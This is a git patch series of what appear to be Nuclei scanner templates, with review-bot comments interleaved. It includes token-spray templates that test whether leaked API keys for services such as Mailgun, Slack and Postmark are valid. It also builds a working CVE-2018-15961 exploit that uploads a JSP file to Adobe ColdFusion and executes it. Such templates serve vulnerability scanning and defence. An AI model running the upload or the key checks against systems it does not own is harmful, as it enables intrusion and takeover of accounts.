a/token-spray/lokalise.yaml +++ b/token-spray/api-lokalise.yaml @@ -3,19 +3,23 @@ id: api-lokalise info: name: Lokalise API Test author: zzeitlin - reference: https://app.lokalise.com/api2docs/curl/#resource-projects severity: info + reference: https://app.lokalise.com/api2docs/curl/#resource-projects tags: token-spray,lokalise self-contained: true requests: - method: GET path: - - "https://api.lokalise.com/api2/projects/" + - "https://api.lokalise.com/api2/teams" headers: - X-Api-Token: "{{token}}" + x-api-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"teams":' + - '"team_id":' + - '"name":' + condition: and \ No newline at end of file 
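Review bot: The Lokalise header key was changed from `X-Api-Token` to `x-api-Token`, a mixed-case form that matches neither the original nor Lokalise's documented name; HTTP header names are case-insensitive so it should still authenticate, but the change looks accidental and will confuse anyone diffing against the docs. Restore `X-Api-Token: "{{token}}"`. The switch from `/api2/projects/` to `/api2/teams` also deserves a comment stating why; if some tokens can list projects but not teams, they would now be reported invalid, which is worth confirming.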
diff --git a/token-spray/loqate.yaml b/token-spray/api-loqate.yaml similarity index 73% rename from token-spray/loqate.yaml rename to token-spray/api-loqate.yaml index dcbf5b156d..10fa82f23a 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/api-loqate.yaml @@ -3,15 +3,15 @@ id: api-loqate info: name: Loqate API Test author: zzeitlin - reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ severity: info + reference: https://www.loqate.com/resources/support/apis/Capture/Interactive/Find/1.1/ tags: token-spray,loqate self-contained: true requests: - method: GET path: - - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" + - "https://api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" matchers: - type: word diff --git a/token-spray/mailchimp.yaml b/token-spray/api-mailchimp.yaml similarity index 100% rename from token-spray/mailchimp.yaml rename to token-spray/api-mailchimp.yaml index d25870e279..5232ddda97 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/api-mailchimp.yaml @@ -3,8 +3,8 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration severity: info + reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration tags: token-spray,mailchimp self-contained: true diff --git a/token-spray/mailgun.yaml b/token-spray/api-mailgun.yaml similarity index 70% rename from token-spray/mailgun.yaml rename to token-spray/api-mailgun.yaml index c4997aaaa4..dfa06bdfaa 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/api-mailgun.yaml 
@@ -3,8 +3,8 @@ id: api-mailgun info: name: Mailgun API Test author: zzeitlin - reference: https://documentation.mailgun.com/en/latest/api-intro.html severity: info + reference: https://documentation.mailgun.com/en/latest/api-intro.html tags: token-spray,mailgun self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Basic {{base64('api:' + token)}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"total_count":' + - '"items":' + - '"created_at":' + condition: and diff --git a/token-spray/mapbox.yaml b/token-spray/api-mapbox.yaml similarity index 71% rename from token-spray/mapbox.yaml rename to token-spray/api-mapbox.yaml index 1e246f783b..4ed5e0648f 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/api-mapbox.yaml @@ -14,7 +14,10 @@ requests: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - 'type' + - 'query' + - 'features' + condition: and diff --git a/token-spray/nerdgraph.yaml b/token-spray/api-nerdgraph.yaml similarity index 100% rename from token-spray/nerdgraph.yaml rename to token-spray/api-nerdgraph.yaml index ca570964e4..d367685e7f 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/api-nerdgraph.yaml @@ -3,8 +3,8 @@ id: api-nerdgraph info: name: New Relic NerdGraph API Test author: zzeitlin - reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ severity: info + reference: https://docs.newrelic.com/docs/apis/nerdgraph/get-started/introduction-new-relic-nerdgraph/ tags: token-spray,newrelic,nerdgraph self-contained: true diff --git a/token-spray/netlify.yaml b/token-spray/api-netlify.yaml similarity index 70% rename from token-spray/netlify.yaml rename to token-spray/api-netlify.yaml index b282f7acd9..e57127c9f5 100644 --- a/token-spray/netlify.yaml +++ b/token-spray/api-netlify.yaml 
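Review bot: The Mapbox words `type`, `query` and `features` are unquoted, so the `and` condition is satisfied by any body that mentions those three words, including a verbose error message; the rest of the commit matches quoted JSON keys and this template should follow suit: `- '"type":'`, `- '"query":'`, `- '"features":'`. With the old 401-based check removed, the word match is the only signal left, so it should be as tight as the sibling templates.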
@@ -3,8 +3,8 @@ id: api-netlify info: name: Netlify API Test author: dwisiswant0 - reference: https://docs.netlify.com/api/get-started/ severity: info + reference: https://docs.netlify.com/api/get-started/ tags: token-spray,netlify self-contained: true @@ -16,6 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"id":' + - '"premium":' + - '"claimed":' + condition: and diff --git a/token-spray/npm.yaml b/token-spray/api-npm.yaml similarity index 90% rename from token-spray/npm.yaml rename to token-spray/api-npm.yaml index fb0ef0b6b7..522c793520 100644 --- a/token-spray/npm.yaml +++ b/token-spray/api-npm.yaml @@ -3,9 +3,9 @@ id: api-npm info: name: NPM API Test author: zzeitlin - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens severity: info - tags: token-spray,node,npm,package,manager + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + tags: token-spray,node,npm self-contained: true requests: diff --git a/token-spray/onelogin.yaml b/token-spray/api-onelogin.yaml similarity index 58% rename from token-spray/onelogin.yaml rename to token-spray/api-onelogin.yaml index f57001c5f9..d8369ad80b 100644 --- a/token-spray/onelogin.yaml +++ b/token-spray/api-onelogin.yaml 
@@ -3,21 +3,25 @@ id: api-onelogin info: name: OneLogin API Test author: dwisiswant0 - reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview tags: token-spray,onelogin self-contained: true requests: - method: GET path: - - "https://api.us.onelogin.com/api/2/users?fields=id" - - "https://api.eu.onelogin.com/api/2/users?fields=id" + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" headers: Authorization: Bearer {{token}} stop-at-first-match: true matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/token-spray/openweather.yaml b/token-spray/api-openweather.yaml similarity index 69% rename from token-spray/openweather.yaml rename to token-spray/api-openweather.yaml index 916936aa97..13a26aecc3 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/api-openweather.yaml @@ -3,8 +3,8 @@ id: api-openweather info: name: OpenWeather API Test author: zzeitlin - reference: https://openweathermap.org/current severity: info + reference: https://openweathermap.org/current tags: token-spray,weather,openweather self-contained: true @@ -14,6 +14,10 @@ requests: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"coord":' + - '"weather":' + - '"base":' + condition: and diff --git a/token-spray/optimizely.yaml b/token-spray/api-optimizely.yaml similarity index 85% rename from token-spray/optimizely.yaml rename to token-spray/api-optimizely.yaml index 8743b893fc..48105d1bec 100644 --- a/token-spray/optimizely.yaml +++ b/token-spray/api-optimizely.yaml 
@@ -3,8 +3,8 @@ id: api-optimizely info: name: Optimizely API Test author: dwisiswant0 - reference: https://library.optimizely.com/docs/api/app/v2/index.html severity: info + reference: https://library.optimizely.com/docs/api/app/v2/index.html tags: token-spray,optimizely self-contained: true @@ -24,4 +24,6 @@ requests: - type: word part: body words: - - "account_id" + - '"account_id":' + - '"confidence_threshold":' + condition: and \ No newline at end of file diff --git a/token-spray/pagerduty.yaml b/token-spray/api-pagerduty.yaml similarity index 76% rename from token-spray/pagerduty.yaml rename to token-spray/api-pagerduty.yaml index bad59948ed..902fae8ec0 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/api-pagerduty.yaml @@ -3,8 +3,8 @@ id: api-pagerduty info: name: Pagerduty API Test author: zzeitlin - reference: https://developer.pagerduty.com/api-reference severity: info + reference: https://developer.pagerduty.com/api-reference tags: token-spray,pagerduty self-contained: true @@ -17,7 +17,9 @@ requests: Authorization: Token token={{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"schedules":' + - '"id":' + condition: and diff --git a/token-spray/paypal.yaml b/token-spray/api-paypal.yaml similarity index 100% rename from token-spray/paypal.yaml rename to token-spray/api-paypal.yaml diff --git a/token-spray/pendo.yaml b/token-spray/api-pendo.yaml similarity index 74% rename from token-spray/pendo.yaml rename to token-spray/api-pendo.yaml index 66cd885dc6..023a6f347c 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/api-pendo.yaml @@ -3,8 +3,8 @@ id: api-pendo info: name: Pendo API Test author: zzeitlin - reference: https://help.pendo.io/resources/support-library/api/index.html severity: info + reference: https://help.pendo.io/resources/support-library/api/index.html tags: token-spray,pendo self-contained: true 
@@ -12,13 +12,14 @@ requests: - method: GET path: - "https://app.pendo.io/api/v1/feature" - - "https://app.pendo.io/api/v1/metadata/schema/account" headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" matchers: - - type: status - status: - - 403 - negative: true \ No newline at end of file + - type: word + part: body + words: + - '"createdByUser":' + - '"id":' + condition: and \ No newline at end of file diff --git a/token-spray/pivotaltracker.yaml b/token-spray/api-pivotaltracker.yaml similarity index 94% rename from token-spray/pivotaltracker.yaml rename to token-spray/api-pivotaltracker.yaml index d7a74ded66..1f7e7007e0 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/api-pivotaltracker.yaml @@ -21,3 +21,4 @@ requests: negative: true words: - 'invalid_authentication' + - 'unauthenticated' diff --git a/token-spray/postmark.yaml b/token-spray/api-postmark.yaml similarity index 63% rename from token-spray/postmark.yaml rename to token-spray/api-postmark.yaml index 85367b5c61..b9bec134db 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/api-postmark.yaml @@ -3,20 +3,24 @@ id: api-postmark info: name: PostMark API Test author: zzeitlin - reference: https://postmarkapp.com/developer/api/overview severity: info + reference: https://postmarkapp.com/developer/api/overview tags: token-spray,postmark self-contained: true requests: - method: GET path: - - "https://api.postmarkapp.com/stats/outbound" + - "https://api.postmarkapp.com/server" headers: Accept: application/json X-Postmark-Server-Token: "{{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"ID":' + - '"Name":' + - '"ApiTokens":' + condition: and diff --git a/token-spray/sendgrid.yaml b/token-spray/api-sendgrid.yaml similarity index 100% rename from token-spray/sendgrid.yaml rename to token-spray/api-sendgrid.yaml index d9330371f1..3c24d1dfaf 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/api-sendgrid.yaml 
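Review bot: The postmark matcher now targets `/server` and keys on `'"ApiTokens":'`, so a positive hit means the response body itself appears to carry the server's other API tokens, and any stored or debug output of that body is secret material; a comment above `matchers:` such as `# /server appears to echo the server's API tokens — handle saved responses as secrets` would tell operators what they are persisting. That the body really lists tokens is inferred from the key name rather than visible here. The pendo hunk on this line only drops a path and swaps to a word matcher, so nothing comparable applies to it.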
@@ -3,8 +3,8 @@ id: api-sendgrid info: name: Sendgrid API Test author: zzeitlin - reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info + reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp tags: token-spray,sendgrid self-contained: true diff --git a/token-spray/slack.yaml b/token-spray/api-slack.yaml similarity index 80% rename from token-spray/slack.yaml rename to token-spray/api-slack.yaml index 8203aa56b5..d9a36d5801 100644 --- a/token-spray/slack.yaml +++ b/token-spray/api-slack.yaml @@ -19,5 +19,7 @@ requests: - type: word part: body words: - - 'error' - negative: true + - '"url":' + - '"team_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/token-spray/travisci.yaml b/token-spray/api-travisci.yaml similarity index 100% rename from token-spray/travisci.yaml rename to token-spray/api-travisci.yaml index 3b43f9e529..63489fc886 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/api-travisci.yaml @@ -3,8 +3,8 @@ id: api-travisci info: name: Travis CI API Test author: zzeitlin - reference: https://developer.travis-ci.com/ severity: info + reference: https://developer.travis-ci.com/ tags: token-spray,travis self-contained: true From 7e10c6eb426e421f2141df5c2d6461817d72a091 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 17:46:34 +0000 Subject: [PATCH 04/25] Creates CVE-2018-15961 Closes #3119 with minor updates to ensure the file isn't accessible predictably --- cves/2018/CVE-2018-15961 | 40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2018/CVE-2018-15961 diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961 new file mode 100644 index 0000000000..6495051c18 --- /dev/null +++ b/cves/2018/CVE-2018-15961 
@@ -0,0 +1,40 @@ +info: + name: CVE-2018-15961 + author: SkyLark-Lab, ImNightmaree + severity: critical + tags: server,cve,cve2018,rce,coldfusion,fileupload + +requests: + - raw: + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg + + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + + {{randstr}} + -----------------------------24464570528145-- + + + + - method: GET + path: + - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + + matchers-condition: and + matchers: + + - type: word + words: + - "{{randstr}}" + + - type: status + status: + - 200 From 136fd744c9c5a02a4dfe2d089e2b2b4b339de2f0 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 17:51:54 +0000 Subject: [PATCH 05/25] Missed a space on author. --- cves/2018/CVE-2018-15961 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961 index 6495051c18..a529ed82e5 100644 --- a/cves/2018/CVE-2018-15961 +++ b/cves/2018/CVE-2018-15961 @@ -1,6 +1,6 @@ info: name: CVE-2018-15961 - author: SkyLark-Lab, ImNightmaree + author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload From 866bcfa0f653f65da2e0bb1ea69fc2b5b653e698 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 10 Nov 2021 23:23:11 +0530 Subject: [PATCH 06/25] Rename CVE-2018-15961 to CVE-2018-15961.yaml --- cves/2018/{CVE-2018-15961 => CVE-2018-15961.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018-15961 => CVE-2018-15961.yaml} (100%) 
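Review bot: The new template has no top-level `id:` field and the file lacks a `.yaml` extension, so as committed it is neither discovered nor loadable; add `id: CVE-2018-15961` above `info:`. The `{{randstr}}` word matcher is also satisfied by any 200 page that echoes the requested path, since the GET URL already contains `{{randstr}}.jsp`, so the check does not show the upload was processed; matching a value that only the uploaded file could produce, with `part: body`, would make the result meaningful. The upload sends `filename="{{randstr}}"` while the second request fetches `{{randstr}}.jsp`, so the two requests never refer to the same file.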
diff --git a/cves/2018/CVE-2018-15961 b/cves/2018/CVE-2018-15961.yaml similarity index 100% rename from cves/2018/CVE-2018-15961 rename to cves/2018/CVE-2018-15961.yaml From 90c265672fc15a5645bb9bfd95ed5e8f1e6d4368 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:00:26 +0000 Subject: [PATCH 07/25] Linting --- cves/2018/CVE-2018-15961.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index a529ed82e5..539651ca46 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -3,7 +3,6 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload - requests: - raw: - | From 03c24bd12d8623cfd8b3fc4fd370a3c8a1cf3444 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:02:59 +0000 Subject: [PATCH 08/25] Linting --- cves/2018/CVE-2018-15961.yaml | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 539651ca46..f36246b29d 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml 
@@ -3,26 +3,24 @@ info: author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload + requests: - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" - Content-Type: image/jpeg - - %%%%%%%% - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" - - {{randstr}} - -----------------------------24464570528145-- + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" + {{randstr}} + -----------------------------24464570528145-- - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" From 3852eedb4628f0f6c99da29b3984e1ce978ddf39 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:05:59 +0000 Subject: [PATCH 09/25] Linting --- cves/2018/CVE-2018-15961.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index f36246b29d..fef6b1da6d 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,9 +1,11 @@ +id:CVE-2018-15961 + info: name: CVE-2018-15961 author: SkyLark-Lab,ImNightmaree severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload - + requests: - raw: - | From 40e6c30e0d7084c507e6947510b1807febf9a6b6 Mon Sep 17 00:00:00 2001 
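Review bot: This re-indent drops the empty lines inside the raw request: on the new side `Content-Type: multipart/form-data; boundary=…` runs straight into the first boundary, and each `Content-Disposition` part runs straight into its content. An HTTP message needs an empty line between the headers and the body, and each multipart part needs one between its headers and its data, so as written the entire body is read as headers and the upload is never parsed. Keep one empty line after the request's `Content-Type` header and after each part's last header line, as the original had.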
From: ImNightmaree Date: Wed, 10 Nov 2021 18:08:18 +0000 Subject: [PATCH 10/25] Linting --- cves/2018/CVE-2018-15961.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index fef6b1da6d..ec9955c574 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -1,4 +1,4 @@ -id:CVE-2018-15961 +id: CVE-2018-15961 info: name: CVE-2018-15961 From 8f8888481d4952efcbb90697e75a7d9d1a4a4014 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 10 Nov 2021 18:14:05 +0000 Subject: [PATCH 12/25] Linting --- cves/2018/CVE-2018-15961.yaml | 27 +++++++++++++-------------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index ec9955c574..8debd1d9e8 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml 
@@ -6,23 +6,23 @@ info: severity: critical tags: server,cve,cve2018,rce,coldfusion,fileupload -requests: +requests: - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 + - | + POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" - Content-Type: image/jpeg + -----------------------------24464570528145 + Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Type: image/jpeg - %%%%%%%% - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" + %%%%%%%% + -----------------------------24464570528145 + Content-Disposition: form-data; name="path" - {{randstr}} - -----------------------------24464570528145-- + {{randstr}} + -----------------------------24464570528145-- - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" @@ -33,7 +33,6 @@ requests: - type: word words: - "{{randstr}}" - - type: status status: - 200 From 6b896965a153e1bd04b9973f3b802716610deb47 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 11 Nov 2021 11:51:24 +0530 Subject: [PATCH 13/25] Update CVE-2018-15961.yaml --- cves/2018/CVE-2018-15961.yaml | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 8debd1d9e8..15dd4b5ea2 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml 
@@ -4,7 +4,10 @@ info: name: CVE-2018-15961 author: SkyLark-Lab,ImNightmaree severity: critical - tags: server,cve,cve2018,rce,coldfusion,fileupload + reference: + - https://github.com/vah13/CVE-2018-15961 + - https://www.cvedetails.com/cve/CVE-2018-15961/ + tags: adobe,cve,cve2018,rce,coldfusion,fileupload requests: - raw: @@ -14,15 +17,16 @@ requests: Content-Type: multipart/form-data; boundary=---------------------------24464570528145 -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}" + Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - %%%%%%%% + <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> -----------------------------24464570528145 Content-Disposition: form-data; name="path" - {{randstr}} + {{randstr}}.jsp -----------------------------24464570528145-- + - method: GET path: - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" @@ -31,8 +35,10 @@ requests: matchers: - type: word + part: body words: - - "{{randstr}}" + - "18188751" + - type: status status: - 200 From 33a733d4f63f90a722cf3b0ef69de12bdacf977e Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 15:05:31 +0530 Subject: [PATCH 14/25] misc updates --- cves/2018/CVE-2018-15961.yaml | 36 +++++++++++++++++++++++++---------- 1 file changed, 26 insertions(+), 10 deletions(-) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 15dd4b5ea2..3055bdfd6f 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml 
@@ -1,13 +1,14 @@ id: CVE-2018-15961 info: - name: CVE-2018-15961 + name: Adobe ColdFusion Unrestricted file upload RCE author: SkyLark-Lab,ImNightmaree severity: critical + description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. reference: - - https://github.com/vah13/CVE-2018-15961 - - https://www.cvedetails.com/cve/CVE-2018-15961/ - tags: adobe,cve,cve2018,rce,coldfusion,fileupload + - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 + - https://github.com/xbufu/CVE-2018-15961 + tags: cve,cve2018,adobe,rce,coldfusion,fileupload requests: - raw: @@ -20,24 +21,39 @@ requests: Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: image/jpeg - <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%> + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2018-15961"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i -----------------------------24464570528145 Content-Disposition: form-data; name="path" {{randstr}}.jsp -----------------------------24464570528145-- - - method: GET - path: - - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp" + - | + GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - type: word - part: body words: - - "18188751" + - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - type: status status: From f47fca558a468053c008a185a20696c98548d9ce Mon Sep 17 00:00:00 2001 
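Review bot: The template uploads `{{randstr}}.jsp` into `uploadedFiles/` and then only reads it back, so every run against a vulnerable host leaves a server-side JSP behind with no cleanup request; the `description` or a comment above `requests:` should say so, e.g. `# NOTE: leaves <randstr>.jsp under uploadedFiles/ on the target; remove it after verification`. The scriptlet's loop reads `for (int i=0;i` in this rendering, which looks like a `<` swallowed by the page rather than the file, but it is worth confirming the committed JSP is intact since a truncated loop would never print the digest the matcher expects. Both requests now sit in one `raw:` list, so if matchers are evaluated per response the upload response is checked too; that is harmless because it cannot contain the digest, but a comment noting the match is expected from the second request would make the intent clear.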
From: GitHub Action Date: Thu, 11 Nov 2021 11:06:36 +0000 Subject: [PATCH 15/25] Auto Generated CVE annotations [Thu Nov 11 11:06:36 UTC 2021] :robot: --- cves/2018/CVE-2018-15961.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml index 3055bdfd6f..6e393a310c 100644 --- a/cves/2018/CVE-2018-15961.yaml +++ b/cves/2018/CVE-2018-15961.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - https://github.com/xbufu/CVE-2018-15961 tags: cve,cve2018,adobe,rce,coldfusion,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-15961 + cwe-id: CWE-434 requests: - raw: From ff1bfd8ed8d92d574e925a22d8945c5d06f75009 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 11 Nov 2021 20:32:39 +0530 Subject: [PATCH 16/25] misc update --- token-spray/{square.yaml => api-square.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename token-spray/{square.yaml => api-square.yaml} (100%) diff --git a/token-spray/square.yaml b/token-spray/api-square.yaml similarity index 100% rename from token-spray/square.yaml rename to token-spray/api-square.yaml From 02ad4e81b0c2bcc6711da9f5b806c31bcd9921a3 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:13:45 -0500 Subject: [PATCH 17/25] Removing misconfiguration/phpmyadmin/phpmyadmin-setup.yaml in favor of miscellaneous/phpmyadmin-setup.yaml --- .../phpmyadmin/phpmyadmin-setup.yaml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 misconfiguration/phpmyadmin/phpmyadmin-setup.yaml diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml deleted file mode 100644 index 2485003909..0000000000 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ /dev/null 
@@ -1,17 +0,0 @@ -id: phpmyadmin-setup - -info: - name: phpMyAdmin setup page - author: thevillagehacker - severity: medium - tags: phpmyadmin - reference: https://hackerone.com/reports/297339 - -requests: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/setup/index.php" - matchers: - - type: word - words: - - "phpMyAdmin setup" From e43e20880d9218a97c45a1c6069c4d77fb2e5074 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 11 Nov 2021 11:14:21 -0500 Subject: [PATCH 18/25] Move miscellaneous/phpmyadmin-setup.yaml to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml --- .../phpmyadmin}/phpmyadmin-setup.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) rename {miscellaneous => misconfiguration/phpmyadmin}/phpmyadmin-setup.yaml (86%) diff --git a/miscellaneous/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml similarity index 86% rename from miscellaneous/phpmyadmin-setup.yaml rename to misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 72870b91b5..7ab271dc14 100644 --- a/miscellaneous/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -17,6 +17,7 